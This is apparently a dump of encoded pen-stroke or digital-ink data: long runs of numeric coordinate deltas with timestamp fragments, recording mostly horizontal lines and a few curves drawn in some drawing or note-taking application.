17-16,-1-17 15,54 0-15,17 0 16,17 53-16,-52-53 15,17 18-15,-70-18 16,0 0-16,-53 0 16,-35 0-16,17 0 15,0 0-15,0 0 16,18 0 0,18 0-16,-1 0 0,1-18 15,52 18-15,-34 0 16,17 0-1,-18 0-15,-18 0 0,-17 0 16,0 0-16,0 0 16,-35 0-1,17 0-15,-17-17 0,-1 17 16,18 0 0,-17-18-1,0 18-15,17 0 16,0 0-16,-17 0 15,35 0-15,0 0 16,-18 0-16,18 18 16,0-18-16,-18 0 15,18 0-15,-35 0 16,17 17 531,0-17-532,-17 0-15,17 0 16,18-35-16,-35 17 16,-1 18-1,1 0 48,0 0-48,17 0-15,18 0 16,0 0-16,0 0 16,0 0-16,52 0 15,1 0-15,-35 0 16,35 0-16,17 0 16,1 0-16,-1 0 15,-17 0-15,0 0 16,-18 0-16,18 0 15,-53 0-15,-36 18 16,1-18-16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9:17.7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3 14129 0,'0'17'0,"18"-17"15,0 0 1,35 0-16,-36 0 16,36 0-16,0 0 15,-18 0-15,36 0 16,-18 0-16,53 0 15,17 0-15,18 0 16,212 0 0,-194 0-16,35 0 15,-35 0-15,-89 0 16,-17 0-16,-18 0 16,-17 0 93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9:19.6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74 14235 0,'17'0'62,"71"0"-62,54-18 16,-1 18-16,35 0 16,0 0-16,-52 0 15,-1 0-15,-52 0 16,-18 0-16,0 0 15,0 0-15,-36 0 16,1 0-16,0 0 78,-1 0-47,1 0-15,0 0-16,-1 0 0,18 0 16,-17 0-1,17 0-15,1-18 16,-1 18-16,18-17 16,0 17-16,0 0 15,17 0-15,-34 0 16,34 0-16,-52 0 47,-18 17 78,-18-17-78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9:21.2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25 14182 0,'0'-18'16,"53"18"-1,-1 0 1,19 0-16,0 0 16,34 0-16,19 0 15,70 0-15,88 0 16,0 0-16,18 0 16,35 0-16,-105 0 15,34 0-15,-52 0 16,-36 0-16,18 0 15,-53 0-15,-17 0 16,-54 0-16,1 0 16,-36 0-16,1 0 15,-1 0-15,-18 0 16,1 0 46,0 0-46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9:30.8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38 15328 0,'0'0'0,"18"0"16,0 0-1,17 0 1,0 0-16,36 0 16,-1-17-16,1-1 15,-18 18-15,0 0 16,0 0-1,0-18-15,-18 18 0,18-17 16,0 17-16,17-18 16,1 18-1,35 0-15,35 0 16,17 0-16,1 0 16,35 0-16,18 53 15,0-35-15,34 17 16,-16 0-16,-71-17 15,-1-1-15,-52 1 16,-18-18-16,-52 18 16,-19-18-16,1 0 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7:39.8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970 9126,'36'0,"19"0,17 0,55 18,37 18,-19-18,36 55,-36-37,73 1,0-37,-19 36,-17 0,-73-36,0 0,-19 0,-53 0,-1 0,-18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9:33.7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688 15487 0,'0'0'0,"123"0"0,1 18 15,-1-18-15,-17 0 16,0 0-16,-18 0 16,-17 0-16,17 0 15,-18 0-15,19 0 16,16 0-16,-34 0 16,176 0-1,511 0 16,-511 0-31,-35 0 16,35 0 0,-71 0-16,1 0 15,-19 0-15,-4109 0 16,8114 0-16,-4110 0 16,0 0-16,-18 0 15,18 0-15,0 0 16,0 0-16,106 0 31,-36 0-31,54 0 0,-1 0 16,36 0-16,-1 0 15,-17 0-15,-53 0 16,-52 0-16,-54 0 16,-17 0 77,-36 17 48,0-17-94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20.4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33 5238 0,'0'0'0,"0"20"16,40-20-16,-21 0 16,1 20-16,40 0 15,-1-20-15,1 20 16,19-20-16,1 0 15,-1 0-15,0 0 16,41 0-16,-61 0 16,20 0-16,-19 0 15,-20 0-15,-1 0 16,1 0-16,-20 0 16,20 0-16,-21 0 15,21 0-15,0 0 16,-20 0-1,19 0-15,-19 0 16,0 0-16,0 0 16,0 0-16,-1 0 15,1 0 1,0 0 0,0 0-1,0 0-15,0 0 31,0 0 48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28.9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18 5298 0,'20'0'31,"0"0"-15,39 0-16,20 0 16,80 0-16,20 0 15,19 0-15,-118 0 16,118 0-16,40 0 16,0 0-16,-19 0 15,-61 0-15,21 0 16,-20 0-16,-20 0 15,19 0-15,-19 0 16,-40 0-16,20-40 16,20 40-16,-59 0 15,-41 0-15,21-39 16,39 19-16,-39 0 16,-40 20-16,39-40 15,1 20-15,19 1 16,-19-1-16,-1 20 15,1-20-15,-1 20 16,21 0-16,-41 0 16,21 0-16,39 0 15,-20 0-15,-19 0 16,19 0-16,-19 0 16,-21 0-1,-19 0-15,0 0 47,0 0-31,0 0-16,0-20 15,-1 20 1,1 0 0,0 0-16,0 0 31,0 0-16,0 0-15,0 0 16,39 0-16,-19 0 16,19 0-16,-39 0 15,0 0-15,0 0 16,0 0 0,0 0 93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30.1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09 5318 0,'40'0'63,"-20"0"-48,19 0-15,21 0 16,-1 0-16,1 0 16,-20 0-1,19 0-15,1-20 0,-1 20 16,-19 0-1,19 0-15,1 0 16,-1 0-16,1 0 16,-20 0-16,-1 0 15,21 0-15,-40-20 16,0 20-16,-1 0 16,-19-20-1,20 20 1,0 0 15,0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32.4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03 5893 0,'19'0'47,"1"0"-31,0 0-1,20 0 1,-20 0-16,59 0 16,0 0-16,60 0 15,0 0-15,40 20 16,19 60-16,-39-41 15,-60 1-15,20 39 16,20-39-16,-40-20 16,40 39-16,-20-59 15,20 40-15,-99-40 16,79 40-16,60-20 16,19 39-16,1-59 15,-61 40-15,-38-40 16,-41 0-16,1 0 15,-21 0-15,-19 0 16,0 0 0,0 0-1,0 0 1,0 0-16,0 0 31,-1 0-15,1 0-16,20 0 15,19 0 1,21 0 0,-21 0-16,1 0 15,-1 0-15,1 0 16,-20 0-16,-21 0 16,1 0-16,0 0 15,0 0 1,0 0 171,0-20-187,-1 0 16,1 20-16,20-20 16,-20 20-16,20-20 15,-21 20 1,1 0-16,0 0 15,0 0-15,0 0 16,0 0 109,-1 0-109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40.9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86 10557 0,'40'0'46,"0"0"-30,19 0-16,1 0 16,-1 0-16,1 0 15,-1 0-15,1 0 16,-1 0-16,1 0 16,-20 0-16,19 0 15,-19 0-15,0 0 16,-1 0-16,1 0 15,-20 0-15,0 0 16,19 0-16,1 0 16,0 0-16,-20 0 15,-1 0-15,21 0 16,0 0-16,0 0 16,-21 0 15,1 0-16,40 0-15,-21 0 16,1 0-16,20 0 16,-21 0-16,21 0 15,-20 0-15,-1 0 16,1 0-16,19 0 16,-19 0-16,20 0 15,19 0-15,-59 0 16,39 0-16,1 0 15,-1 0-15,1 0 16,-20 0-16,-1 0 16,1 0-16,0 0 15,19 0-15,-39 0 16,40 0-16,-21 0 16,1 0-16,20 0 15,-1 0-15,1 0 16,-1 0-1,21 0-15,-41 19 0,41 1 16,39 20-16,-20-40 16,-20 20-16,1-20 15,19 0 1,-20 0-16,1 0 16,-1 0-16,60 0 15,-60 0-15,40 0 16,0 0-16,20 0 15,-20 0-15,20 0 16,20 0-16,20 0 16,-120 0-16,100 0 15,19 0-15,-19 0 16,40 0-16,-41 0 16,1 0-16,-40 20 15,0 0-15,0 19 16,20 1-16,-20 19 15,-19-39-15,38 20 16,-19 0-16,-19-20 16,-41 19-16,-19-19 15,-20-20-15,0 0 16,-1 0 46,1 0 17,0 0-64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43.7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883 9941 0,'-19'0'16,"19"20"-1,-60 40-15,20-20 16,-19-1-16,-1 41 16,1-41-16,-21 21 15,21 19-15,-20-59 16,19 40-16,20-41 15,40 1-15,-20-20 16,20 20 0,20-20 31,0 0-32,79 0-15,20 0 16,60 0-16,0 0 15,19 0-15,0 0 16,-39 0-16,-20 0 16,-59 0-16,-21 0 15,-19 0-15,-20-20 16,19 0 0,-39 1 77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44.6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38 9862 0,'0'0'0,"-39"60"0,19-21 15,0 1 1,0 0-16,0-1 15,0 21-15,1-1 16,19 1-16,0-20 16,0-1-16,-20 1 15,0 0-15,0-1 16,20 1-16,-20 0 16,20-1-16,-20 21 15,0-20-15,1-1 16,19-19-1,0 0 17,0 0-17,-20-20 1,20 20-16,0 0 16,0-1-1,-20 21 1,0 0-1,0-20-15,0 19 16,1 21-16,-1-20 16,0-1-16,0-19 15,20 0-15,0 0 16,0 0 0,0-1-1,-20-19 1,20-19 62,20-1-62,0 0-16,-20 0 15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45.8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094 9584 0,'0'40'15,"0"-20"1,0 20-16,0-1 15,0 21-15,0 59 16,0 20-16,-40 59 16,-19 20-16,39-138 15,-79 158 1,59-20-16,-20-19 16,21-80-16,19-40 15,0-59-15,20 20 16,0-21-1,-20-19 1,20 20-16,0 0 16,0 0-1,0 0 1,-20-20 0,20 20-16,0-1 15,0-38 126,0-1-126,0 0 1,0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3:49.1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213 9604 0,'20'0'93,"19"0"-93,1 0 16,-20 0-16,40 0 16,-1 0-1,-39 0-15,59 20 16,-59 0-16,20-20 16,-20 20-16,0-20 15,-1 20-15,1-20 16,0 0-16,0 0 15,-20 19-15,20-19 16,-20 20-16,20 20 16,-1-20-16,1 0 15,0 19 1,0 1-16,-20-20 0,20 0 16,-20-1-1,0 1-15,0 0 16,0 20-16,0-20 15,0 19 1,0-19-16,0 0 16,0 0-16,0 20 15,0-21-15,0 1 16,0 20-16,0 0 16,0-21-16,-20 21 15,20 20-15,-40-60 16,40 39-16,-39 1 15,-1-20 1,20 0-16,-20 0 16,-19 19-16,19-19 15,0 20-15,1-40 16,-1 20-16,0 19 16,21-39-16,-1 0 15,0 0-15,0 20 16,0-20-16,-20 0 31,21 0-15,-1 0-1,0 0-15,0 0 16,0 0-16,0 0 16,-19 0-16,-1 0 15,20 0 1,0 20-1,1-20-15,-1 0 16,0 0 0,20-20 171,0 0-17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6:25.4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27 12101,'0'-18,"18"18,0 0,19 0,-1 0,-18 0,36 0,19 0,-37 0,37 0,-19 0,19 0,-1 0,1 0,36 0,-18 0,36 0,0 0,-37 0,74 0,-1 0,-18 0,-36 0,36 0,0 18,0-18,19 18,-19 1,-55-19,37 0,-36 0,18 0,-55 0,-17 0,-1 0,0 0,1 0,-1 0,-18 0,18 0,1 0,17 0,-18 0,37 0,-1 0,-17 0,17 0,19 0,-36 0,-1 0,0 0,-17 0,17 0,37 0,-55 0,55 0,-37 0,1 0,-1 0,1 0,-1 0,-18 0,19 0,-1 0,1 0,17 0,-17 0,17 0,1 0,-1 0,1 0,72 0,0 0,-36 0,18 0,-36 0,36 0,18 0,-54 0,36 0,0 0,-19 0,38 0,-19 0,0 0,0 0,36 0,-18 0,-54 0,18 0,-37 18,-17 0,17 0,19-18,-55 0,19 18,-1-18,0 0,-17 0,17 0,1 0,-19 0,0 0,-18 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,19 0,17 0,-36 0,37 0,-1 0,19 0,-1 0,-17 0,-1 0,19 0,17 0,-17 0,18 0,-1 0,-17 0,36 0,-37 0,19 0,-37 0,-17 0,17 0,37-18,-37 18,-36 0,1 0,-1 0,0 0,0-18,0 18,18 0,-17 0,-1 0,18 0,-18 0,0 0,0 0,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0:30.8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184 1887,'0'-18,"36"18,0 0,19 0,17 0,19 0,36 0,18 0,55 0,-37 0,55 0,-37 0,73 0,-18 0,-18 0,-19 18,-36-18,-17 0,-19 0,-37 0,-35 0,-1 0,-36 0,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4:06.1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35 13970 0,'20'0'125,"0"-40"-109,79 40-16,20 0 16,40 0-16,-40 0 15,80 0-15,-21 0 16,-19 0-1,20 0-15,19 0 0,-19 0 16,-40 0 0,39 0-16,-39 0 15,20 0-15,0 0 16,-100 0-16,80 0 16,20 0-16,-20 0 15,0-20-15,-20 20 16,20 0-16,-1 0 15,-58 0-15,-21 0 16,-39 0-16,0 0 16,0 0-1,0 0 1,0 0 0,-1 0-16,1 0 15,0 0 1,0 0-1,0 0 1,0 0-16,-1 0 16,1 0-16,0-20 15,20 20-15,-20 0 16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55.0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09 14406 0,'20'0'63,"19"-20"-48,21 1-15,39-1 16,0 0-16,60 20 15,20 0-15,-1 0 16,60 0-16,0 0 16,-19 0-16,19 0 15,-40 0 1,-138 0-16,138 0 16,-99 0-16,-39 0 15,-40 0-15,20 0 219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56.0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19 14506 0,'20'0'31,"19"-20"-15,1 20-1,39 0 1,1-20-16,39 20 0,0 0 16,20 0-1,19 0-15,1 0 16,20 0-16,19 0 15,-19 0-15,-1 0 16,21 0-16,-1 0 16,1 0-16,-40 0 15,-80 0-15,100 0 16,-41 0-16,-38 0 16,39 0-16,-60 0 15,0 0-15,1 0 16,19 0-16,-40 0 15,1 0-15,19 0 16,-19 0-16,-1 0 16,-39 0-16,0 0 15,0 0-15,0 0 16,0 0 31,-1 0-47,1 0 15,20 0-15,0-20 16,-20 20-16,-1-20 16,21 20-16,-40-20 15,20 20-15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10.5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573 15577 0,'20'0'78,"0"0"-78,19-20 16,-19 0-16,60 20 15,-1 0-15,60 0 16,0 0-16,-40 0 15,40 0-15,-40 0 16,-39 0-16,59 0 16,20 0-16,-20 0 15,-20 0-15,0 0 16,40 0-16,20 0 16,20 80-16,-1-60 15,60-1-15,-39-19 16,-41 0-16,1 0 15,0 0 1,-40 0-16,0 0 16,-20 0-16,-39 0 15,-40 0-15,39 0 16,-39 0-16,0 0 16,0 0-16,0 0 15,19 0-15,-19 0 16,40 0-16,-21 0 15,1 0-15,-20 0 16,0 0-16,-1 0 16,1 0-16,0 0 15,20 0-15,-20 0 16,0 0 0,-1 0-16,1 0 15,0 0 1,20 0-16,-1 0 0,1 0 15,0 0 1,0 0-16,-1 0 0,-19 0 16,20 0-1,-1 0 1,-19 0-16,20 0 16,-20 0-16,0 0 15,0 0-15,-1 0 16,1 0-1,0 0-15,0 0 16,0 0 62,0 0-47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18.6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80 15418 0,'20'0'63,"20"0"-63,119 0 16,39 0-16,20 0 15,40 0-15,-19 0 16,19 0-16,-40 0 15,0 0 1,-178-615-16,119 1230 16,-40-615-16,-20-20 15,-60 20-15,21 0 16,-20 0-16,-1 0 16,41 0-16,-21 0 15,21 0-15,39 0 16,-20 0-16,0 0 15,20 0-15,-20 0 16,21 0-16,-41 0 16,-20 0-16,-19 0 15,-20 0 17,0 0-17,0 0 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19.4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15 15398 0,'40'0'47,"59"0"-31,60 0-16,-20 0 16,59 0-16,-39 0 15,0 0-15,0 0 16,-1 0-16,-38 0 15,38 0-15,41 0 16,-41 0-16,1 0 16,-40 0-16,-59 0 15,39 0-15,-20 0 16,1 0-16,-41 0 16,1 0-16,-20 0 15,0 0-15,0 0 16,0 0-1,-1 0 142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7:46.3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846 16002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7:52.2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93 11956,'36'0,"-18"0,18 0,-18 0,1 0,17 0,0 0,0 0,19 0,-1 0,19 0,18 0,17 0,1 0,0 0,18 0,18 0,-36 0,18 0,0 0,0 0,-18 0,-36 0,-1 0,19 0,-37 0,-17 0,17 0,0 0,-17 0,-1 0,37 0,-19 0,0 0,19 0,0 18,17-18,-17 18,-1-18,1 0,36 0,-37 0,19 0,36 0,0 0,18 0,-36 0,18 0,-36 0,18 0,36 0,-73 0,1 19,-19-19,1 0,-19 0,-18 0,0 0,1 0,-1 0,0 0,0 18,18-18,-18 0,19 0,-1 0,-18 0,0 0,19 0,-19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47:54.4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943 12029,'19'0,"17"0,18 0,1-18,17-1,19 19,54 0,37 0,53 0,1 0,55 0,-37 0,36 0,-54 0,0 0,90 0,-54 0,-36 0,0 0,18 0,0 0,-36 19,36-1,-73-18,19 0,17 36,-53-36,-19 0,-18 18,-55-18,-17 0,-19 0,19 18,-37-18,-18 18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6:50.1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095 10672 0,'0'-18'203,"35"18"-203,53 0 16,124 0-16,35 0 16,18 0-16,17 0 15,53-88-15,-35 70 16,-89 18-16,-17 0 15,18 0-15,-36 0 16,-52 0-16,-53 0 16,-19-18-16,-34 18 15,0 0-15,-1 0 63,36 0-48,35 0-15,54 0 16,34 0-16,-35 0 16,18 0-16,-71 0 15,0 0 1,-17 0-16,-18 0 16,0 0-16,0 0 15,-18 0-15,35 18 16,1-18-16,35 0 15,35 35-15,-71-35 16,19 0-16,34 0 16,36 53-16,-71-53 15,35 0-15,-52 0 16,0 0-16,-18 0 16,-36 0-16,36 0 15,0 18-15,-18-18 16,18 18-16,-35-18 15,17 0-15,-17 0 16,-1 17 0,1-17 31,0 0-1,-1 0-46,1 0 16,0 0 0,-1 0-1,1 0-15,0 0 78,17 0-78,-18 0 16,1 0 0,0 0-1,-1 0 17,19 0-32,-1 0 15,0-17 1,18 17-16,-35-18 15,17 0-15,-17 18 16,-1-17 15,1 17-15,17-18-16,-17 18 31,-1 0-31,1 0 4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47.3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566 5824,'36'0,"-18"0,37 0,-1 0,37 0,18 0,18 0,18 0,0 0,-36 0,36 0,0 0,-18 0,18 0,55 0,-37 0,55 0,-19 0,-35 0,35 0,-36 0,1 0,17 0,-36 18,37-18,35 0,37 0,-18 0,0 0,-18 0,18 0,0 0,-37 0,-36 0,37 0,-37 0,19 0,-37 0,0 0,0 0,-36 0,-18 0,-1 0,-17 0,-19 0,-17 0,-1 0,-18 0,18 0,-17 0,17 0,-18 0,-18-18,36 18,-18 0,37 0,-1-18,-17 18,-1 0,18 0,1 0,-19 0,18 0,-17 0,-1 0,0 0,19 0,-1 0,-18 0,-17 0,-1 0,0 0,0 0,0 0,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38.6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46 4039 0,'17'0'63,"19"0"-63,-1 0 15,35 0 1,1 0-16,0 0 0,-1 0 16,36-17-16,-53 17 15,-18 0-15,0 0 16,18 0-16,36 0 31,140 0 0,-176 0-31,-36 0 0,19 0 16,-19 0-16,19 0 63,-19 0-63,1 0 15,17 0-15,18 0 16,-18 0-16,18 0 15,-17 0-15,-19-18 16,18 0-16,-17 18 16,0 0-16,17 0 15,-17 0 1,-1 0-16,19 0 16,16 0-1,-34 0-15,17 0 16,18 18-1,36 0-15,-54-18 16,0 0-16,-17 0 16,17 17-16,-17 1 15,-1-18 1,1 0-16,0 18 16,-1-18-1,1 17 48,-18 1-32,17-18 0,1 0-15,0 0 31,-1 0-32,1 0 1,17 0 0,1 0-16,16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41.2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50 4374 0,'18'0'78,"34"0"-78,19 0 15,-18 0-15,35 0 16,18 0-16,-36-17 16,1-1-16,0-17 15,-18 0-15,-18 17 16,18 0-16,53 1 31,-54-1-31,1 18 0,-17 0 16,34 0-16,36 0 15,18 0-15,-1 35 16,-17-17-16,-53 0 16,-18-18-16,18 0 15,-18 0 1,0 0-16,18 0 15,-17 0-15,17 0 16,-36 0-16,18 0 16,-17 0-16,17 0 15,1 17-15,-19-17 16,1 18-16,17-18 16,-17 0-1,17 0 1,0 0-16,1 0 15,17 0-15,-18 0 16,18 0-16,-36 0 16,19 0-16,-1 0 15,-17 0-15,-1 0 16,1 0-16,0 0 16,-1 0-1,1 0-15,0 18 16,-1-18-16,1 17 15,-1-17 1,1 0 140,0 0-140,-1 0 0,1 0-1,0 0 1,-36 18 78,-35-1-94,35-17 15,54 18 173,-19-18-188,19 0 15,-1 18-15,18-1 16,-18 1-16,-17-18 16,-1 0-16,19 0 15,-19 18 1,1-18 15,0 0-15,-1 17-1,18-17 17,1 0-32,-36 18 15,17-18 204,-17 18-219,0 17 16,18-18-1,0 1-15,-1-18 31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6:43.1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060 4128 0,'-18'0'47,"18"17"-32,35 18-15,18-35 16,0 18-16,-18-18 16,1 0-16,17 0 15,-18 0-15,0 0 16,0 0-16,1 0 15,-1 0-15,0 0 16,18 18-16,18-1 16,52 1-16,1 0 15,17-1-15,0 1 16,18 0-16,-54-1 16,-52-17-16,0 0 15,0 0-15,-35 0 16,-1 0-1,1 0-15,0 0 32,-1 0-17,1 0 17,0 0-32,-1 0 15,1 0 1,0 0-16,17 0 15,-18 0 1,1 0-16,0 0 16,-1 0-16,1 0 15,0 0 1,-1 0 0,1 0-1,0 0-15,17 0 16,0 0-16,0 0 15,-17 0-15,17 0 16,1 0-16,17 0 16,-1 0-16,-16 0 15,-1 0-15,18 0 16,-18 0-16,18 0 16,-18 0-1,1 0-15,-19 0 0,36 0 16,-35 0-16,-1 0 15,1 0-15,0 0 16,-1 0 109,1 0-109,0 0-1,-1 0 32,1 0-16,0 0-15,-1 0 0,1 0-1,0 0 1,-1 0-16,1 0 109,-1 0-109,1 0 16,17 0-16,-17 0 16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38:13.7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72 5433 0,'17'0'46,"54"0"-30,70 0-16,71 0 16,70 0-1,106 0-15,141 0 16,36 0-16,-36 0 16,106 0-16,-159 0 15,53 0-15,-141 0 16,-159 0-16,-17 0 15,-53 0-15,-53 0 16,-36 0-16,-34 0 16,-1 0-16,-18 0 15,1 0 32,0 0-31,-1 0 15,1 0-15,0 17 31,-1-17-16,1 0 16,-18 18 46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4:33.1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34 5080 0,'35'0'15,"-17"0"1,17 0-16,1 0 16,16 0-16,19 0 15,35 0-15,-18 0 16,53 0-16,53-18 15,18 18-15,17 0 16,-17 0-16,-1 0 16,1 0-16,-53-35 15,17 17-15,-88 1 16,1 17-16,-19 0 16,-35 0-16,-17 0 15,0-18 63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4:34.7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50 5415 0,'0'0'0,"35"0"15,0 0 1,-17 0-16,0 0 16,17 18-16,-17-18 15,-1 0-15,1 0 16,0 0-1,-1 0-15,1 0 16,35 0-16,0 0 16,0 0-16,52 0 31,1-18-31,-35 18 0,52-17 16,1 17-16,-1-18 15,36 0-15,-36 18 16,-17 0-16,0 0 15,-18 0 1,-17 0-16,35 0 16,-18 0-16,-18 0 15,54 0 1,-106 0-16,-1 0 16,18 0 30,-17 0-30,35 0-16,18 0 16,-19 0-16,19 0 15,17 0-15,-17 18 16,-36-18-16,0 18 16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4:40.6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28 6615 0,'53'0'78,"-17"0"-78,16 0 16,-16 17-16,17-17 16,0 0-16,17 0 15,1 0-15,35 0 16,-1 0-16,19 0 15,35 0-15,-18 0 16,70 0-16,36 0 16,-17 0-16,-1 0 15,0 0-15,-52 0 16,-36 0 0,-35 0-16,17 0 0,-17-17 15,-36 17-15,36-18 16,-18 0-16,36 18 15,-1 0-15,36 0 16,0 0 0,17 0-16,-17-17 15,-18-1-15,0 0 16,-17 1-16,-1-1 16,1 0-16,17 1 15,18 17-15,-18 0 16,53 0-16,-36 0 15,36 0-15,-35 0 16,0 0-16,-53 17 16,17 1-16,-52-18 15,-18 0-15,0 0 16,-36 0-16,19 0 16,-19 0-16,18 0 15,1 0-15,-19 0 16,36 18-16,0-18 15,18 17-15,-18-17 16,-18 18-16,-17 0 16,17-18-16,0 0 15,-17 0 1,-1 0-16,1 0 16,0 0-16,35 0 15,-18 0 1,-17 0-16,34 0 15,1 0-15,36 0 16,16 0-16,-16 0 16,-1 0-16,317 35 31,-228 0-31,-36-17 16,18-18-16,-18 0 15,-18 0-15,-17 0 16,-35 0-16,-18-18 15,0 1-15,-36 17 16,1 0-16,-1 0 94,1 0 15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5:17.5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58 8996 0,'0'0'0,"17"0"0,1 17 15,52 1 1,-52-18-16,35 0 15,18 0-15,17 0 16,35 0-16,1 0 16,34 0-16,-16 0 15,-19 0-15,-52 0 16,-36 0-16,-17 0 16,-1 0-16,1 0 171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5:19.1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33 9084 0,'0'0'0,"88"0"15,-18 0-15,1 0 16,52 18-16,1-18 16,-18 0-16,35 0 15,0 0 1,-18 0-16,-17 0 0,-70 0 15,-19 0-15,1 0 110,-1 0-110,1 0 15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5:22.1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045 9049 0,'17'0'63,"36"0"-63,35 0 15,1 0-15,52 0 16,0 0-16,35 0 16,1 0-16,-1 0 15,-70 0 1,17 0-16,-17 0 16,-35 0-16,17 0 15,-18 0-15,54 0 16,17 0-16,18 0 15,52 0-15,1 0 16,0 0-16,-54 0 16,-69 0-16,-36 0 15,-36 0 63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53.2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683 4282,'18'0,"-18"-18,18 18,0 0,1 0,-1 0,36 0,19-19,-1 19,1 0,54 0,-36 0,36 0,-37 0,37 0,0 0,-36 0,-18 0,17 0,-35 0,-1 0,-36 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,-18 19,36-19,-18 0,0 0,19 0,-1 0,18 0,1 18,-1-18,19 0,-37 18,0-18,-17 0,17 0,-18 0,0 0,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5:23.0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719 9049 0,'0'0'0,"35"0"16,18 0-16,35 0 15,-17 0-15,-1 0 16,1 0-16,17 0 16,0 0-16,36 0 15,-36 0-15,18 0 16,-36 0-16,1 0 16,-18 0-16,0 0 15,-18 17-15,0-17 16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1:45:26.1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74 10072 0,'-17'-18'31,"-1"18"-15,18-17-1,-18 17 1,1 0-16,-36 0 15,0 0-15,-35 0 16,-18 0-16,-35 0 16,-36 0-16,19 0 15,-1 0-15,18 0 16,17 0-16,1 0 16,52 0-16,18 0 15,18 0-15,17 0 16,-17 0-16,0 0 31,0 0-31,17 0 63,-17 0-48,-18 0-15,0 0 16,0 0-16,-18 0 15,36 0 1,-18 0-16,18 0 0,17 0 16,-17 0-16,0 0 15,17 0 1,0 0-16,1 0 16,-18 0-16,52 0 78,1 0-63,17 0 32,0 52-31,1-52-1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39:46.8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74 9966 0,'0'0'0,"17"0"16,19 0-16,-1 0 15,-17 0-15,52 0 16,1 0-16,-1 0 16,54 0-16,34 0 15,-16 0-15,34 35 16,18-17-16,-35 17 16,35 0-16,-53-35 15,0 18-15,-18-18 16,1 0-16,-53 0 15,-1 0-15,1 0 16,-54 0 0,19 0-16,-19 0 15,1 0 17,17 0-32,0 0 15,36 0-15,35 0 16,-18 0-1,35 0-15,-17 0 16,18 0-16,-1 35 16,1-17-16,-1 0 15,1-1-15,-1 1 16,1 0-16,17-1 16,0 1-16,18-1 15,35 19-15,17-19 16,-17 19-16,0-19 15,-35 19-15,17-19 16,-34 1-16,-19 0 16,18-18-1,-106 0-15,1 0 16,-19 0 0,1 0 15,0 0-16,-1 0-15,1 0 16,17 0 0,-17 0-1,-1 0 1,1 0 0,17 0-1,1 0-15,-1 0 16,18-18-16,0-17 15,17 17-15,18-17 16,-17 35-16,70-18 16,18 0-16,0-17 15,-18 17-15,0 18 16,0 0-16,0 0 16,-17 0-16,-1 0 15,-17 0-15,17 0 16,-17 0-16,-35 0 15,-18 0-15,0 0 16,-36 0-16,1 0 16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6:50.4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80 11311 0,'20'0'47,"59"0"-47,80 0 16,-1 0-16,1 0 15,40 39-15,19 1 16,-20 20-16,-138-41 16,118 21-16,-39-20 15,-59-20-15,-41 0 16,1 0-16,20 0 15,-21 0-15,-19 0 16,20 0-16,-20 0 16,19 0-16,1 0 15,-20 0-15,20 0 16,-21 0-16,1 0 16,0 0-16,0 0 15,0 0 1,0 0-16,-1 0 15,1 0-15,0 0 16,20 0 0,-20 0-16,0 0 15,-1 0-15,1 0 16,0 0 31,-20 20-16,20-20-15,0 0-1,0 0 32,-20 20-47,19-20 16,1 0-1,0 0 1,0 0 0,0 0-16,0 0 15,39 0 1,-19 0-16,19 0 16,-19 0-1,20 19-15,-1 1 16,-19-20-16,0 0 15,-21 0-15,1 0 16,0 0-16,0 0 16,0 0-16,39 0 15,-39 0-15,0 0 16,0 0-16,20 0 16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6:51.3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005 11410 0,'0'0'0,"20"0"0,39 0 16,1 0-16,39 0 15,60 0-15,39 0 16,-39 0-16,0 0 16,-40 0-16,20 0 15,-60 0-15,-19 0 16,-21 0-1,1 0-15,-20 0 47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6:52.8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48 11509 0,'20'0'78,"0"0"-62,39 0 0,40 0-16,40 0 15,40 0-15,39 0 16,40 0-16,0 0 16,-20 0-16,0 0 15,-158 0-15,158 0 16,-20 0-16,-39 0 15,-20 0-15,-21 0 16,21 0-16,20 0 16,-1 0-16,21 0 15,-21 0-15,1 0 16,59 0-16,0 0 16,-20 0-16,-19 0 15,-60 0-15,0 0 16,-40 0-16,-79 0 15,39 0-15,1 0 16,-1 0-16,21 0 16,-41 0-16,21 0 15,-20 0-15,19 0 16,-39 0-16,20 0 16,-1 0-1,1 0-15,-20 0 16,0 0-16,19 0 15,21 0-15,-20 0 16,-1 0-16,-19 0 16,40 0-16,19 0 15,-39 0-15,19 0 16,-39 0-16,20 0 16,-20 0-1,0 0 63,-1 0-15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33.3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32 10160 0,'0'-20'16,"20"20"0,0 0-16,0 0 15,-20-20-15,20 20 16,0 0 15,0 0-15,-1 0-16,1 0 15,0 0 1,20 0-16,19 0 16,41 0-16,19 0 15,-20 0-15,0 0 16,20 0-16,-20 0 16,40 0-16,-40 0 15,20 0-15,-19 0 16,39 0-16,0 0 15,39 0-15,-98 0 16,98 0-16,60 0 16,-20 0-16,-19 20 15,-40 20-15,19-1 16,1 21-16,-60-21 16,-40 1-16,1-20 15,-21 0-15,1 0 16,-1 0-16,1-1 15,-1 1-15,41 0 16,-21 20-16,20-1 16,-79-39-16,40 20 15,-21-20 1,1 20-16,-20-20 16,0 0-16,-1 0 15,41 0-15,-20 0 16,-1 0-16,21 0 15,-1 0-15,1 0 16,-1 0-16,1 0 16,0 0-16,-1 0 15,-19 0-15,19 0 16,-19 0 0,19-20-16,21 0 15,-21 20 1,-19 0-16,0 0 15,-1 0-15,1 0 16,0 0-16,-20 0 16,0 0-16,39 0 15,-19 0-15,-1 0 16,21 0-16,0 0 16,-21 0-16,21 0 15,-1 0 1,1 0-1,-1 0-15,-19 0 0,0 0 16,19 0 0,-19 0-16,0 0 15,-1 0-15,1 0 16,19 0-16,-19 0 16,0 0-16,0 0 15,-1 0-15,1 0 16,-20 0-1,0 0 1,-20-19 0,19 19-1,1 0 17,0 0-1,0 0-16,20 0-15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37.0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713 8969 0,'19'0'62,"1"0"-62,40 0 16,-1 0-1,80 0-15,20 0 16,79 0-16,0 0 16,0 0-16,-39 0 15,19 0-15,-59 0 16,-119 0-16,39 0 15,-19 0-15,-41 0 16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28.1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192 5278 0,'0'-20'47,"20"20"0,0 0-47,20 0 15,19 0-15,41 0 16,-1 0-16,79 0 15,21 0-15,-1 0 16,1 0-16,-21 0 16,1 0-16,-20 0 15,39 0 1,-39 0-16,19 0 16,41 0-16,19 0 15,-40 0-15,-79 0 16,80 0-16,19 0 15,-59 0-15,0 0 16,19 0-16,-19 0 16,39 0-16,-98 0 15,-61 0-15,1 0 16,-20 0-16,0 0 16,0 0-1,-1 0 1,1 0-1,0 0 48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31.9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25 5675 0,'-39'0'32,"-21"20"-17,-19 0-15,-40 19 16,0 21-16,59-40 16,-39 39-16,59-19 15,1-20-15,19 0 